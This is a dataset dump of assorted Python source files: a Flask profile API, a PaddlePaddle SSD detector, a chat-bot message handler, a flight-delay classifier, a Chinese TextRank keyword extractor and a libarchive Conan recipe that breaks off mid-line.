id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
3288797 | <gh_stars>1-10
from src.schema.question.crud import CreateQuestion, UpdateQuestion
from src.schema.question.response_example import (
create_response_example,
delete_response_example,
get_by_id_response_example,
get_multi_response_example,
update_response_example,
)
| StarcoderdataPython |
4832754 | # Realiza un pequeño script en Python que lea dos números M y N a través de la consola,
# y que para ellos genere una lista que contenga las primeras M potencias del número N
# Crea dos versiones del mismo script, una utilizando ciclos normales, y la otra utilizando listas comprimidas
# Versión 2
M = int(input("Valor para M: "))
N = int(input("Valor para N: "))
r = [N ** i for i in range(1, M+1)]
print("\nResultados =", r) | StarcoderdataPython |
44626 | <reponame>sohje/__flask_psgr<gh_stars>0
import os
from sqlalchemy import (create_engine, MetaData,
Table, Column, Integer, Text, String, DateTime)
from flask import Flask, request, jsonify, g
from mock_session import session_info_retriever
app = Flask(__name__)
# config.DevelopmentConfig -> sqlite://testing.db
# config.ProductionConfig -> postgresql://localhost/testing
app.config.from_object(os.environ.get('APP_SETTINGS', 'config.DevelopmentConfig'))
engine = create_engine(app.config['DATABASE_URI'], convert_unicode=True)
metadata = MetaData(bind=engine)
users = Table('users', metadata,
Column('user_id', Integer, primary_key=True),
Column('name', Text),
Column('sex', Text),
Column('birthday', DateTime),
Column('city', Text),
Column('country', Text),
Column('ethnicity', Text)
)
error_sess_obj = {'status': 'error', 'Message': 'Invalid session'}
error_data_obj = {'status': 'error', 'Message': 'Invalid data'}
def init_db():
from mock_users import users_list
db = get_db()
db.execute('DROP TABLE IF EXISTS users;')
metadata.create_all()
db.execute(users.insert(), users_list)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = engine.connect()
return db
@app.before_request
def before_request():
g.db = get_db()
@app.teardown_appcontext
def teardown_db(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
# initialize db
@app.before_first_request
def init_me():
init_db()
# retrieve user profile
@app.route('/api/v1/profiles/<user_id>', methods=['GET'])
def return_profile(user_id):
# validate user session
session = request.cookies.get('session') or request.args.get('session')
session_info = session_info_retriever(session)
if session_info['data']['session_exists'] == False: # check session
return jsonify(error_sess_obj)
st = users.select().where(users.c.user_id == user_id)
result = g.db.execute(st).fetchone()
return jsonify(result) if result is not None else jsonify({})
# update profile
@app.route('/api/v1/profiles/self', methods=['PUT', 'PATCH'])
def change_profile():
session = request.cookies.get('session') or request.args.get('session')
session_info = session_info_retriever(session)
data = request.get_json()
if session_info['data']['session_exists'] == False: # check session
return jsonify(error_sess_obj)
elif not data:
return jsonify(error_data_obj)
user_id = session_info['data']['session_data']['user_id']
# todo: validate json body before exec
# todo: patch/put (update/modify entries)
st = users.update().where(users.c.user_id == user_id).values(data)
try:
g.db.execute(st)
except Exception as e:
return jsonify({'status': 'error', 'message': str(e), 'data': data})
return jsonify({'status': 'OK'})
if __name__ == '__main__':
app.run()
| StarcoderdataPython |
3221464 | import pathlib
from pathlib import Path
import numpy as np
import pandas
from .mockers import CASING_DF, DIRTY_DF, SNAKE_CASED_COLS, generate_test_df
TESTING_PATH = pathlib.Path(__file__).parent.absolute()
def test_cleanup():
from sheetwork.core.cleaner import SheetCleaner
clean_df_path = Path(TESTING_PATH, "clean_df.json")
dirty_df = generate_test_df(DIRTY_DF)
clean_df = SheetCleaner(dirty_df).cleanup()
expected_df = pandas.read_json(
clean_df_path,
dtype={"col_with_empty_string": "object"},
)
expected_df = expected_df.fillna(np.nan)
assert clean_df.equals(expected_df)
def test_snake_to_camel():
from sheetwork.core.cleaner import SheetCleaner
cased_df = generate_test_df(CASING_DF)
recased_df = SheetCleaner(cased_df, True).cleanup()
assert recased_df.columns.tolist() == SNAKE_CASED_COLS
| StarcoderdataPython |
1603624 | <filename>using-modules/importing-modules.py
# ------------------------------------------------------------------------------------
# Tutorial: importing modules
# ------------------------------------------------------------------------------------
# What is a module ?
# A module is a file which ends by .py. Very simple, you can even create
# yourself a module. The name of the module takes automatically the name of the file.
# It can contain many things (functions, variable ...) you can use everywhere on your project.
# To use a module, you have to import it. We use the keyword "import" + module name.
# Example for one import :
# import os
# But Python have standard so let's do it well...
# Multiple imports, not in the same line :
# import sys
# import warnings
# Specific thing imported from a module we use the keyword "from" :
# from datetime import date
# but we can write that like we see above :
# import datetime.date
# the path is really important, it means date is in the file datetime.py
# Note that all imports must be at the top of the file
# ------------------------------------------------------------------------------------
# Challenge: use the random import
# ------------------------------------------------------------------------------------
# Python has the module random, import it and uncomment the code below to show a
# random number and set your favorite number to show a nice message if it's the
# right number when you execute this file
# favorite_number = 1
# number = random.randint(0, 6)
# if number == favorite_number:
# print("Yeah, it's your number! Lucky you!")
# else:
# print('Nope, try again')
| StarcoderdataPython |
9402 | import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
class MobileNetV2SSD:
def __init__(self, img, num_classes, img_shape):
self.img = img
self.num_classes = num_classes
self.img_shape = img_shape
def ssd_net(self, scale=1.0):
# 300x300
bottleneck_params_list = [(1, 16, 1, 1),
(6, 24, 2, 2),
(6, 32, 3, 2),
(6, 64, 4, 2),
(6, 96, 3, 1)]
# conv1
input = self.conv_bn_layer(input=self.img,
num_filters=int(32 * scale),
filter_size=3,
stride=2,
padding=1,
if_act=True)
# bottleneck sequences
in_c = int(32 * scale)
for layer_setting in bottleneck_params_list:
t, c, n, s = layer_setting
input = self.invresi_blocks(input=input, in_c=in_c, t=t, c=int(c * scale), n=n, s=s)
in_c = int(c * scale)
# 19x19
module11 = input
tmp = self.invresi_blocks(input=input, in_c=in_c, t=6, c=int(160 * scale), n=3, s=2)
# 10x10
module13 = self.invresi_blocks(input=tmp, in_c=int(160 * scale), t=6, c=int(320 * scale), n=1, s=1)
module14 = self.extra_block(module13, 256, 512, 1)
# 5x5
module15 = self.extra_block(module14, 128, 256, 1)
# 3x3
module16 = self.extra_block(module15, 128, 256, 1)
# 2x2
module17 = self.extra_block(module16, 64, 128, 1)
mbox_locs, mbox_confs, box, box_var = fluid.layers.multi_box_head(
inputs=[module11, module13, module14, module15, module16, module17],
image=self.img,
num_classes=self.num_classes,
min_ratio=20,
max_ratio=90,
min_sizes=[60.0, 105.0, 150.0, 195.0, 240.0, 285.0],
max_sizes=[[], 150.0, 195.0, 240.0, 285.0, 300.0],
aspect_ratios=[[2.], [2., 3.], [2., 3.], [2., 3.], [2., 3.], [2., 3.]],
base_size=self.img_shape[2],
offset=0.5,
flip=True)
return mbox_locs, mbox_confs, box, box_var
def conv_bn_layer(self, input, filter_size, num_filters, stride, padding, num_groups=1, if_act=True,
use_cudnn=True):
parameter_attr = ParamAttr(learning_rate=0.1, initializer=MSRA())
conv = fluid.layers.conv2d(input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
groups=num_groups,
use_cudnn=use_cudnn,
param_attr=parameter_attr,
bias_attr=False)
bn = fluid.layers.batch_norm(input=conv)
if if_act:
return fluid.layers.relu6(bn)
else:
return bn
def shortcut(self, input, data_residual):
return fluid.layers.elementwise_add(input, data_residual)
def inverted_residual_unit(self,
input,
num_in_filter,
num_filters,
ifshortcut,
stride,
filter_size,
padding,
expansion_factor):
num_expfilter = int(round(num_in_filter * expansion_factor))
channel_expand = self.conv_bn_layer(input=input,
num_filters=num_expfilter,
filter_size=1,
stride=1,
padding=0,
num_groups=1,
if_act=True)
bottleneck_conv = self.conv_bn_layer(input=channel_expand,
num_filters=num_expfilter,
filter_size=filter_size,
stride=stride,
padding=padding,
num_groups=num_expfilter,
if_act=True,
use_cudnn=False)
linear_out = self.conv_bn_layer(input=bottleneck_conv,
num_filters=num_filters,
filter_size=1,
stride=1,
padding=0,
num_groups=1,
if_act=False)
if ifshortcut:
out = self.shortcut(input=input, data_residual=linear_out)
return out
else:
return linear_out
def invresi_blocks(self, input, in_c, t, c, n, s):
first_block = self.inverted_residual_unit(input=input,
num_in_filter=in_c,
num_filters=c,
ifshortcut=False,
stride=s,
filter_size=3,
padding=1,
expansion_factor=t)
last_residual_block = first_block
last_c = c
for i in range(1, n):
last_residual_block = self.inverted_residual_unit(input=last_residual_block,
num_in_filter=last_c,
num_filters=c,
ifshortcut=True,
stride=1,
filter_size=3,
padding=1,
expansion_factor=t)
return last_residual_block
def conv_bn(self, input, filter_size, num_filters, stride, padding, num_groups=1, act='relu', use_cudnn=True):
parameter_attr = ParamAttr(learning_rate=0.1, initializer=MSRA())
conv = fluid.layers.conv2d(input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
groups=num_groups,
use_cudnn=use_cudnn,
param_attr=parameter_attr,
bias_attr=False)
return fluid.layers.batch_norm(input=conv, act=act)
def extra_block(self, input, num_filters1, num_filters2, num_groups):
# 1x1 conv
pointwise_conv = self.conv_bn(input=input,
filter_size=1,
num_filters=int(num_filters1),
stride=1,
num_groups=int(num_groups),
padding=0)
# 3x3 conv
normal_conv = self.conv_bn(input=pointwise_conv,
filter_size=3,
num_filters=int(num_filters2),
stride=2,
num_groups=int(num_groups),
padding=1)
return normal_conv
def build_ssd(img, num_classes, img_shape):
ssd_model = MobileNetV2SSD(img, num_classes, img_shape)
return ssd_model.ssd_net()
if __name__ == '__main__':
data = fluid.data(name='data', shape=[None, 3, 300, 300])
build_ssd(data, 21, img_shape=[3, 300, 300])
| StarcoderdataPython |
3314675 | import logging
import datetime
import parsedatetime
from pymongo import MongoClient
from .constants import *
from .helpers import *
from .skills import *
class Message:
'''
Input::
Message ID: Unique ID of the message
User ID: User from whom message received
Message: message as received
Hooklist: For hook lookup
Returns::
messageId: str,
fromUserId: str,
message: str,
dtCreated: datetime,
hook: str,
hookId: str,
body: str,
hookFound: Boolean,
intentFound: Booleen
'''
def __init__(self, updateId, chatId, messageId, fromUserId, fname, username, message, HOOKLIST, INTENTLIST, DIAPROMPTS, collection, dbSearchQuery=None):
self.updateId = updateId
self.chatId = chatId
self.messageId = messageId
self.fromUserId = fromUserId
self.fname = fname
self.username = username
self.message = message
self.dtCreated = datetime.datetime.now()
self.hookFound = False
self.intentFound = False
self.isReminder = False
self.dtExtracted = datetime.datetime(1970,1,1) # Default value for date to satisfy mongoDB insert command
self.isDeletable = True
self.deleteWaitTime = 3
self.serviceReply = "Sorry I didn't get that but the message has been saved.\nTry typing: ```/help```"
self.mentions = extract_keywords(self.message, 'mentions')
self.tags = extract_keywords(self.message, 'hashtags')
self.amount = extract_keywords(self.message, 'numbers')
self.amount = 0 if self.amount == [] else int(self.amount[0])
self.requestedMessageId = extract_keywords(self.message, 'requestedMessageIds')
# self.taskStatus = None # done, archive, active
self.extract_hook(HOOKLIST, INTENTLIST)
self.execute_hook(DIAPROMPTS, collection, dbSearchQuery=None)
def extract_hook(self, HOOKLIST, INTENTLIST):
'''
Separates hook and body via partition.
Returns None if hook not found and same message.
'''
# Extract a hook from the message
for x in list(HOOKLIST.values()):
if self.message.lower().startswith(tuple(x)):
self.hook = x[0].split(' ')[1].lower()
for i in x:
if self.message.lower().startswith(i):
self.hookId = i
self.body = self.message.lower().partition(i)[-1]
self.hookFound = True
break
# Assign default values if hook not found
else:
self.hook = "default"
self.hookId = "dsave"
self.body = self.message
# Assign True if hook is an intent False if not
self.intentFound = True if self.hook in INTENTLIST else False
# First sentence is title if valid hook found. Else no title.
if self.hookFound:
self.title = self.message.partition(". ")[0].replace(self.hookId, "").title()
else:
self.title = ""
return None
def execute_hook(self, DIAPROMPTS, collection, dbSearchQuery=None):
if not self.intentFound:
self.deleteWaitTime = 10
self.save_to_db(collection)
# If no intent then just save the message to db and send a 'message saved' service message to user
# self.serviceReply = "💌"
if self.hook in DIAPROMPTS.keys():
hookPos = list(DIAPROMPTS).index(self.hook)
if hookPos < len(DIAPROMPTS)-1:
self.serviceReply = f"👍 {self.hook.title()}\n\n☝️ {list(DIAPROMPTS.values())[hookPos+1]}"
else:
self.serviceReply = "🏆 All entries made! 🏆"
else:
self.serviceReply="Sorry I didn't catch that but the message is saved.\nTry typing: ```/help```"
else: # Note to self: maybe I'll create an intent class that lives in another file and I just call it here.
if self.hook == 'bookmark':
self.save_to_db(collection)
self.serviceReply = "Feature in development 💌"
elif self.hook == 'show':
self.dtExtracted = extract_date(self.message)
# == REMINDER SKILL == #
if 'reminders' in self.message.lower():
if "day" in self.message.lower():
self.dtExtracted = self.dtExtracted.replace(hour=0, minute=0, second=0, microsecond=0) #datetime.date.today()
self.dbSearchOperator = ["$gte", "$lt"]
self.dbSearchQuery = {
'isReminder':True,
'fromUserId':self.fromUserId,
'dtExtracted':{self.dbSearchOperator[0]:self.dtExtracted,self.dbSearchOperator[1]:self.dtExtracted+datetime.timedelta(days=1)}
}
else:
self.dbSearchOperator = "$gte"
self.dbSearchQuery = {'isReminder':True, 'fromUserId':self.fromUserId, 'dtExtracted':{self.dbSearchOperator:self.dtExtracted}}
self.dbProjection = {'_id':0, 'messageId':1, 'body':1 } # Alert: Can extract only 2 fields at a time using dict instead of pandas
limit = 0
# self.dbSearchOperator = "$eq" if "today" in self.message.lower() else "$gte"
# self.dbSearchQuery = {'isReminder':True, 'fromUserId':self.fromUserId, 'dtExtracted':{self.dbSearchOperator:self.dtExtracted}}
# self.dbProjection = {'_id':0, 'messageId':1, 'body':1 } # Alert: Can extract only 2 fields at a time using dict instead of pandas
# limit = 0
self.serviceReply = show_records(collection, self.dbSearchQuery, self.dbProjection, limit)
self.isDeletable = False
# working mongo query: db.responses.find({$and: [{'isReminder':true}, {dtExtracted:{$gt:ISODate('2021-05-01')}} ]},{_id:0, title:1, dtExtracted:1})
# self.dbSearchQuery = db.responses.find({$and: [{'isReminder':true}, {'dtExtracted':{$gt:ISODate({self.dtCreated.isoformat()})}} ]},{'_id':0, 'title':1, 'dtExtracted':1})"
# self.dbProjection = {'_id':0, 'title':1, 'dtExtracted':1}
# self.searchResult = self.search_db(collection)
# self.serviceReply = "Feature in development 💌"
# == REMINDER SKILL END == #
elif self.hook == 'do':
self.serviceReply = "Feature in development 💌"
elif self.hook == 'shorten':
self.serviceReply = "Feature in development 💌"
elif self.hook == 'remind':
self.isReminder = True
self.dtExtracted = extract_date(self.message)
self.save_to_db(collection)
self.serviceReply = "⏰" # If no intent then just save the message to db and send a 'message saved' service message to user
elif self.hook == 'timeit':
self.serviceReply = "Feature in development 💌"
elif self.hook == 'help':
self.serviceReply = HELPTEXT
self.isDeletable = False
elif self.hook == 'jour':
self.serviceReply = JOURNALTAGS
self.isDeletable = False
else:
pass
# Once intent is executed a service message ("jobs done") message needs to be sent to the user
# Im not sure if this should be done by the message class or the bot class. As on [[2021-06-03]]
# self.send_service_message("The x intent has been executed")
return None
def save_to_db(self, collection):
self.dbDocument = {
'updateId' : self.updateId,
'chatId' : self.chatId,
'messageId' : self.messageId,
'fromUserId' : self.fromUserId,
'username' : self.username,
'body' : self.body,
'title' : self.title,
'hook' : self.hook,
'hookId' : self.hookId,
'dtCreated' : self.dtCreated,
'dtExtracted' : self.dtExtracted,
'isReminder' : self.isReminder,
'mentions' : self.mentions,
'tags' : self.tags,
'amount' : self.amount
}
self.dbInsertId = collection.insert_one(self.dbDocument).inserted_id
| StarcoderdataPython |
75156 | <gh_stars>0
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import random as rnd
from sklearn import preprocessing
###############파일불러오기
print("file_load...")
df = pd.read_csv('AFSNT.csv', engine='python')
#############전처리하기
print("pre-processing...")
#널제거
#df = df.fillna("null")
#ATT 빈값 STT로 채우기
guess_df = df['STT'].loc[df['ATT'].isnull()]
df['ATT'].loc[df['ATT'].isnull()] = guess_df
# 결항처리제거하고 결항 칼럼 날리기
df = df.loc[(df['CNR'].isnull()) | ((df['CNR'].notnull()) & (df['DLY'] == 'Y'))]
df = df.drop(['CNR','CNL'], axis = 1)
# 등록기호 랜덤으로 채우기
REG_Range = ['SEw3NTk0', 'SEw3NzAz', 'SEw4MjM2', 'SEw4MDI4', 'SEw3NTE0', 'SEw4MDMx', 'SEw3NzU3', 'SEw3NTYw', 'SEw3NzY', 'SEw3NTA2', 'SEw3NTY4']
REG_Randomset = []
for i in range(229):
REG_Randomset.append(rnd.choice(REG_Range))
df['REG'].loc[df['REG'].isnull()] = REG_Randomset
# 지연, 부정기편, 요일 수치화
df['DLY'].loc[df['DLY'] == 'Y'] = 1
df['DLY'].loc[df['DLY'] == 'N'] = 0
df['IRR'].loc[df['IRR'] == 'Y'] = 1
df['IRR'].loc[df['IRR'] == 'N'] = 0
df['AOD'].loc[df['AOD'] == 'D'] = 1
df['AOD'].loc[df['AOD'] == 'A'] = 0
df['SDT_DY'].loc[df['SDT_DY'] == '월'] = 1
df['SDT_DY'].loc[df['SDT_DY'] == '화'] = 2
df['SDT_DY'].loc[df['SDT_DY'] == '수'] = 3
df['SDT_DY'].loc[df['SDT_DY'] == '목'] = 4
df['SDT_DY'].loc[df['SDT_DY'] == '금'] = 5
df['SDT_DY'].loc[df['SDT_DY'] == '토'] = 6
df['SDT_DY'].loc[df['SDT_DY'] == '일'] = 7
# 시/분 단위로 나누기
STT_Hour = []
STT_Minute = []
ATT_Hour = []
ATT_Minute = []
STT = df['STT']
ATT = df['ATT']
sub = STT.str.split(':', expand = True)
STT_Hour = sub.iloc[0:, 0]
STT_Minute = sub.iloc[0:, 1]
sub2 = ATT.str.split(':', expand = True)
ATT_Hour = sub2.iloc[0:, 0]
ATT_Minute = sub2.iloc[0:, 1]
df['STT_H'] = STT_Hour.astype(int)
df['STT_M'] = STT_Minute.astype(int)
df['ATT_H'] = ATT_Hour.astype(int)
df['ATT_M'] = ATT_Minute.astype(int)
#DRR 지연사유 수치화
df['DRR'].loc[df['DRR'].isnull()] = 0
df['DRR'].loc[(
(df["DRR"] == "C02") |
(df["DRR"] == "C01") |
(df["DRR"] == "D01") |
(df["DRR"] == "C03") |
(df["DRR"] == "C14") |
(df["DRR"] == "B01")
)] = 1
df['DRR'].loc[(df['DRR'] != 0) &
(df['DRR'] != 1)] = 2
## 나머지 수치화시키기
label_encoder = preprocessing.LabelEncoder()
# AOD
df_y = label_encoder.fit_transform(df['AOD'])
df['AOD'] = df_y.reshape(len(df_y), 1)
# REG
df_y = label_encoder.fit_transform(df['REG'])
df['REG'] = df_y.reshape(len(df_y), 1)
# FLO
df_y = label_encoder.fit_transform(df['FLO'])
df['FLO'] = df_y.reshape(len(df_y), 1)
# ARP
df_y = label_encoder.fit_transform(df['ARP'])
df['ARP'] = df_y.reshape(len(df_y), 1)
# ODP
df_y = label_encoder.fit_transform(df['ODP'])
df['ODP'] = df_y.reshape(len(df_y), 1)
#쓸모x 칼럼 삭제
df = df.drop(['STT', 'ATT',"FLT"], axis = 1)
# 테스트에없는 칼럼 삭제
df = df.drop(['DRR','ATT_H',"ATT_M"], axis = 1)
#데이터셋 스플릿하기
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits = 1, test_size = 0.2, random_state=42)
df_x = df
for df_index, val_index in split.split(df_x, df_x['AOD']) :
df1 = df_x.iloc[df_index]
val1 = df_x.iloc[val_index]
#학습데이터셋 스플릿하기
df_x = df1.sort_values(["SDT_YY"], ascending=[True])
df_y = df_x['DLY']
df_x = df_x.drop(['DLY'], axis=1)
#밸리드데이터셋 스플릿하기
val_x = val1.sort_values(["SDT_YY"], ascending=[True])
val_y = val_x['DLY']
val_x = val_x.drop(['DLY'], axis=1)
######학습하기
from sklearn import linear_model
from sklearn.svm import SVC, LinearSVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import Perceptron
from sklearn.linear_model import SGDClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report
models = [
linear_model.LogisticRegression(),
SVC(),
KNeighborsClassifier(n_neighbors = 3),
GaussianNB(),
Perceptron(),
LinearSVC(),
SGDClassifier(),
DecisionTreeClassifier()
]
for model in models:
model.fit(df_x, df_y)
pred = model.predict(val_x)
print(model)
print(classification_report(val_y, pred))
print()
random_forest = RandomForestClassifier(n_estimators=100)
random_forest.fit(df_x, df_y)
Y_pred = random_forest.predict(val_x)
print(random_forest)
print(classification_report(val_y, pred))
print()
| StarcoderdataPython |
1765778 | <gh_stars>0
# coding=utf-8
"""
@ license: Apache Licence
@ github: invoker4zoo
@ author: invoker/cc
@ wechart: whatshowlove
@ software: PyCharm
@ file: text_rank_seg.py
@ time: $18-8-14 上午11:48
"""
import numpy as np
from tool.logger import logger
from tool.punct import punct
import thulac
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# GOLBAL PARAMS
THUNLP_MODEL_PATH = "/home/showlove/cc/code/THULAC-Python/models"
THUNLP_USER_DIC_PATH = "/home/showlove/PycharmProjects/data_test/nlp/user_dic.txt"
STOP_WORD_DIC_PATH = "/home/showlove/PycharmProjects/data_test/nlp/stop_word_dic.txt"
class TextSummary4Seg(object):
"""
"""
def __init__(self, doc, window_size, alpha, step, nlp_model, doc_seg=False, ):
"""
:param doc:
:param window_size:
:param alpha:
:param step:
:param doc_seg: 传入文档是否为分词后的文档
"""
self.doc = doc
self.window_size = window_size
self.alpha = alpha
self.step = step
self.net_edge = {}
self.thunlp_model = nlp_model
# 分词/清洗
if not doc_seg:
self.origin_doc_seg = self.cut_doc()
self.doc_seg_clear = self._clear_seg_list(self.origin_doc_seg)
else:
self.origin_doc_seg = self.doc
self.doc_seg_clear = self._clear_seg_list(self.doc)
self.doc_seg_list = [seg_info[0] for seg_info in self.doc_seg_clear]
self.origin_doc_seg_list = [seg_info[0] for seg_info in self.origin_doc_seg]
# 计算重要度
self.cal_text_rank()
def cut_doc(self):
"""
将文档进行分词处理
:return:
"""
logger.info(u'文档文本未分词,使用thunlp进行分词')
# self.thunlp_model = thulac.thulac(seg_only=False, model_path=THUNLP_MODEL_PATH, \
# user_dict=THUNLP_USER_DIC_PATH)
doc_seg = self.thunlp_model.cut(self.doc)
# 保存原始分词结果,进行关键相邻词的短语组合
# self.origin_doc_seg = doc_seg
# doc_seg_clear = self._clear_seg_list(doc_seg)
return doc_seg
def _clear_seg_list(self, doc_seg):
"""
清洗分词结果,主要步骤为去除词性重要度不高的词,去除停用词,去除标点符号
:param doc_seg: 初始的分词结果
:return:
"""
doc_seg_clear = self._filter_tag(doc_seg)
doc_seg_clear = self._remove_stop_word(doc_seg_clear)
doc_seg_clear = self._remove_punct(doc_seg_clear)
return doc_seg_clear
def _filter_tag(self, seg_list, tag_filter=['a','d','v','n', 'ns', 'ni', 'vm', 'vd', 'uw'], reverse=False):
"""
:param seg_list:
:param tag_filter: 需要过滤的词性
n/名词 np/人名 ns/地名 ni/机构名 nz/其它专名
m/数词 q/量词 mq/数量词 t/时间词 f/方位词 s/处所词
v/动词 a/形容词 d/副词 h/前接成分 k/后接成分 i/习语
j/简称 r/代词 c/连词 p/介词 u/助词 y/语气助词
e/叹词 o/拟声词 g/语素 w/标点 x/其它 vm/能愿动词 vd/趋向动词
uw/用户字典
:return:
"""
if reverse:
return [seg_info for seg_info in seg_list if seg_info[1] not in tag_filter]
else:
return [seg_info for seg_info in seg_list if seg_info[1] in tag_filter]
def _remove_stop_word(self, seg_list, stop_word_dic_path=STOP_WORD_DIC_PATH):
"""
去除停用词
:param seg_list:
:param stop_word_dic_path: 停用词典文件路径
:return:
"""
with open(stop_word_dic_path, 'rb') as f:
stop_word_list = f.read().split('\n')
return [seg_info for seg_info in seg_list if seg_info[0] not in stop_word_list]
def _remove_punct(self, seg_list, punct=punct):
"""
去除常用标点和符号
:param seg_list:
:param punct:
:return:
"""
return [seg_info for seg_info in seg_list if seg_info[0] not in punct]
def count_relation(self):
"""
通过滑动窗口,统计词间联系数量
:return:
"""
word_count_dic = {}
doc_length = len(self.doc_seg_list)
if doc_length > self.window_size:
for index in range(0, doc_length):
if index == doc_length-1:
word = self.doc_seg_list[index]
word_count_dic[word] = list()
continue
word = self.doc_seg_list[index]
if word not in word_count_dic.keys():
word_count_dic[word] = list()
if index + self.window_size< doc_length-1:
for seg in self.doc_seg_list[index + 1: index + self.window_size]:
word_count_dic[word].append(seg)
else:
for seg in self.doc_seg_list[index + 1:]:
word_count_dic[word].append(seg)
else:
if index + self.window_size < doc_length - 1:
for seg in self.doc_seg_list[index+1: index + self.window_size]:
word_count_dic[word].append(seg)
else:
for seg in self.doc_seg_list[index + 1:]:
word_count_dic[word].append(seg)
else:
logger.warning('文档长度小于滑动窗口长度')
pass
return word_count_dic
def build_graph(self):
"""
:return:
"""
self.word_length = len(set(self.doc_seg_list))
matrix = np.zeros([self.word_length, self.word_length])
word_count_dic = self.count_relation()
word_index_dic = {}
index_word_dic = {}
for index, word in enumerate(set(self.doc_seg_list)):
word_index_dic[word] = index
index_word_dic[index] = word
for word in word_index_dic.keys():
for seg in word_count_dic[word]:
matrix[word_index_dic[word]][word_index_dic[seg]] += 1
matrix[word_index_dic[seg]][word_index_dic[word]] += 1
# 归一化
for j in range(matrix.shape[1]):
sum = 0
for i in range(matrix.shape[0]):
sum += matrix[i][j]
for i in range(matrix.shape[0]):
matrix[i][j] /= sum
# 记录词表
self.word_index_dic = word_index_dic
self.index_word_dic = index_word_dic
return matrix
def cal_text_rank(self):
"""
计算word的pagerank重要度矩阵
:return:
"""
self.matrix = self.build_graph()
imp_matrix = np.ones([self.word_length, 1])
for _ in range(0, self.step):
imp_matrix_hat = (1 - self.alpha) + self.alpha * np.dot(self.matrix, imp_matrix)
# 判断终止条件
###########
imp_matrix = imp_matrix_hat
self.imp_matrix = imp_matrix
def print_result(self):
"""
输出重要性排序结果
:return:
"""
word_imp = {}
for index in range(0, len(self.imp_matrix)):
word_imp[self.index_word_dic[index]] = self.imp_matrix[index][0]
result = sorted(word_imp.items(), key=lambda x:x[1], reverse=True)
for item in result:
print item[0] + ':' + str(item[1])
def top_n_seg(self, top_n=5):
"""
返回重要度最高的n个词
:param top_n:
:return:
"""
word_imp = {}
for index in range(0, len(self.imp_matrix)):
word_imp[self.index_word_dic[index]] = self.imp_matrix[index][0]
result = sorted(word_imp.items(), key=lambda x:x[1], reverse=True)
return result[:top_n]
def seg_merge(self, top_n=20):
"""
排序靠前的seg,如果在文档中处于相邻位置则进行融合
:return:
"""
_top_seg = self.top_n_seg(top_n=top_n)
top_seg = [seg[0] for seg in _top_seg]
top_merge_seg = list()
seg_index = list()
doc_length = len(self.origin_doc_seg_list)
for seg in top_seg:
seg_index += [index for index, _ in enumerate(self.origin_doc_seg_list) if _==seg]
seg_index = sorted(seg_index, key=lambda x:x, reverse=False)
# merge part
cache_list = list()
for n in seg_index:
if n not in cache_list:
merge_list = list()
merge_list.append(n)
for addition in range(1, top_n):
if n + addition in seg_index:
merge_list.append(n + addition)
else:
break
if len(merge_list) > 1:
top_merge_seg.append(merge_list)
cache_list += merge_list
else:
continue
# get merge string
result_list = list()
for _merge_list in top_merge_seg:
result_string = ''
for index in _merge_list:
result_string += self.origin_doc_seg_list[index]
result_list.append(result_string)
return result_list
if __name__ == '__main__':
doc = u'程序员(英文Programmer)是从事程序开发、维护的专业人员。一般将程序员分为程序设计人员和程序编码人员,但两者的界限并不非常清楚,特别是在中国。软件从业人员分为初级程序员、高级程序员、系统分析员和项目经理四大类。'
doc = """
网易体育2月11日讯:^M
2007/2008赛季CBA联赛总决赛首回合比赛^M
将于北京时间2月13日晚7点半正式打响^M
,首场较量华南虎广东宏远将坐镇主场迎接东北虎辽宁盼盼的挑战,比赛打到这个份上,总
冠军奖杯近在咫尺,谁都不想遗憾地错过,本轮比赛,两只老虎势必会有一场殊死之战。^M
相对于篮球场上其它位置,大前锋在队上担任的任务几乎都是以苦工为主,要抢篮板、防守
、卡位都少不了他,但是要投篮、得分,他却经常是最后一个,从一定程度上说,大前锋是
篮球场上最不起眼的。但是就是这个位置,却往往在比赛中扮演着至关重要的角色。下面就
让我们来比较以下两队在这个位置上的人员配置。^M
广东队这个位置杜锋、朱芳雨都能独挡一面,即使在国内篮坛来说,这个人员储备都称得上
是豪华。辽宁队的刘相韬、李晓旭与谷立业就队内来说也是这个位置上的好手。但是把他们
放到一个同等的界面上来说,却又有很大的不同。^M
国内名气方面:^M
广东队无疑要远远胜于辽宁,无论是杜锋还是朱芳雨都是国字号球员,在国内篮坛都是赫赫
有名的角色,相比较而言,辽宁队的刘相韬,谷立业尽管在辽宁上有一些名气,但是在国内
篮坛他们还远称不上“大腕”。^M
个人技术方面:
"""
thunlp_model = thulac.thulac(seg_only=False, model_path=THUNLP_MODEL_PATH, user_dict=THUNLP_USER_DIC_PATH)
model = TextSummary4Seg(doc, 6, 0.85, 700, thunlp_model)
# model.print_result()
# for seg in model.origin_doc_seg_list:
# print seg
top_n_seg = model.top_n_seg(10)
top_n_seg_merge = model.seg_merge(20)
pass | StarcoderdataPython |
3314326 | from conans import ConanFile, AutoToolsBuildEnvironment, tools
class LibarciveConan(ConanFile):
name = "libarchive"
version = "3.3.3"
license = "https://raw.githubusercontent.com/libarchive/libarchive/master/COPYING"
author = "<NAME> <<EMAIL>>"
url = "https://github.com/appimage-conan-community/conan-libarchive"
description = "Libarchive for use in AppImage"
topics = ("libarchive", "iso", "tar")
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
def source(self):
tools.download("https://libarchive.org/downloads/libarchive-3.3.3.tar.gz",
"libarchive-3.3.3.tar.gz")
tools.untargz("libarchive-3.3.3.tar.gz")
def build(self):
autotools = AutoToolsBuildEnvironment(self)
autotools.fPIC = True
env_build_vars = autotools.vars
configure_args = ["--disable-bsdtar", "--disable-bsdcat", "--disable-bsdcpio", "--with-zlib",
